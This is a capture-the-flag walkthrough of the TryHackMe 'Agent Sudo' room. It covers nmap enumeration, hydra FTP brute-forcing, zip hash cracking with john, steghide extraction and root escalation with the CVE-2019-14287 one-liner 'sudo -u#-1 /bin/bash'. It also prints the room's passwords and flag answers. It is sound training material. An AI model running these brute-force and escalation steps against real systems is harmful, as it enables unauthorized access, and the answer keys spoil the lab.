Tryhackme - Agent Sudo

Tryhackme – Agent Sudo

In this walk through, we will be going through the Agent Sudo room from Tryhackme. The room covers basic enumeration, getting initial access with some bruteforce and then elevating privileges by abusing the sudo binary. Overall, it is a fun beginner level room which will covers varies basic topics and will test your methodology. So, without any delay, let’s get started.

Agent Sudo

Machine Info:

TitleAgent Sudo
IPaddress10.10.203.67
DifficultyEasy
ObjectiveYou found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Task 1 – Author note

Task 1 - Author Note

Task 2 – Enumerate

Enumerate the machine and get all the important information.

  • Checking if machine is live or not.

pinging the machine

Question 1 – How many open ports?

  • Scanning the machine using nmap.
sudo nmap -sS -sV 10.10.203.67

nmap scan

3

Question 2 – How you redirect yourself to a secret page?

  • Accessing the website on port 80.

accessing port 80

user-agent

Question 3 – What is the agent name?

  • Use user agent switcher extension and put the user agent value to “C”, then refresh the page.

user agent switcher

Got the agent name
chris

Task 2 - Enumerate

Task 3 – Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Question 1 – FTP password

  • Firing hydra at FTP
hydra -l chris -P ~/Desktop/Wordlist/rockyou.txt ftp://10.10.203.67
hydra brute-forcing ftp

crystal

Question 2 – Zip file password

  • Logging into the FTP server with credentials we got earlier and downloading the files.

ftp login

getting To_agenJ.txt

  • Reading contents of To_agentJ.txt

cat To_agentJ.txt

  • Tried exiftool and steghide on both of the images. Got nothing useful.

exiftool

exiftool 1

  • Using binwalk to reveal hidden files. Binwalk is a fast and easy-to-use tool for analyzing, reverse engineering, and extracting firmware images.
binwalk cutie.png
binwalk -e cutie.png

binwalk cutie.png

got the zip file

  • Converting zip file into john zip file hash type and cracking the hash.

zip2john 8702.zip > hash.txt
converting zip to john hash

john hash.txt

cracking the hash with john

alien

Question 3 – steg password

  • Extracting the zip file with the password cracked above.

opening up the zip file

got a base 64 string

  • Decoded the base 64 string in cyberchef. We got the password.

using cyberchef to decode base 64

Area51

Question 4 – Who is the other agent (in full name)?

  • Extracting the image steg content with the decoded password.

steghide extract -sf cute-alien.jpg

steghide extract

cat message.txt

james

Question 5 – SSH password

hackerrules!

Task 3 - Hash cracking and brute-force

Task 4 – Capture the user flag

You know the drill.

Question 1 – What is the user flag?

  • Getting a shell using SSH and getting the user flag

ssh and user flag.

b03d975e8c92a7c04146cfa7a5a313c7

Question 2 – What is the incident of the photo called?

  • Search on Google – Alien autospy incident foxnews

Alien autospy incident foxnews

Roswell alien autops

Task 4 - Capture the flag

Task 5 – Privilege escalation

Enough with the extraordinary stuff? Time to get real.

  • Getting the linpeas script from the local system and executing on our target machine.

linpeas download and run

vulnerable sudo version

Question 1 – CVE number for the escalation

  • Searching for Sudo version 1.8.21, i found the vulnerability.

Privilege escalation with sudo

CVE-2019-14287

Question 2 – What is the root flag?

sudo -l

sudo -l

sudo -u#-1 /bin/bash

sudo -u#-1 /bin/bash

got the root flag

b53a02f55b57d4439e3341834d70c062

Question 3 – (Bonus) Who is Agent R?

Deskel

Task 5 - Privilege escalation

Also Read: Tryhackme – c4ptur3-th3-fl4g

Conclusion:

Conclusion

So that was it. We started the room with a basic enumeration using nmap. Next, Used user-agent switcher to get the potential username to proceed further. Moving on, Bruteforced user “chris” FTP password and downloaded the 3 files – 2 pictures and one txt file. On the downloaded files, used binwalk to extract the zip file. Next, Convert and crack zip password with John. Further, Used the zip file to get a base 64 string. Decoding that string got the steg password of the challenge. Using that password, decoded the message stored in the pictures. In the output file, got the other user name and SSH password. For initial access, SSH into the server using the user’s creds. Got the first flag. For escalating the privileges, used linpeas to get the potential priv escalation vector. Finally, Got a vulnerable sudo version. Leveraging that we got the root.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top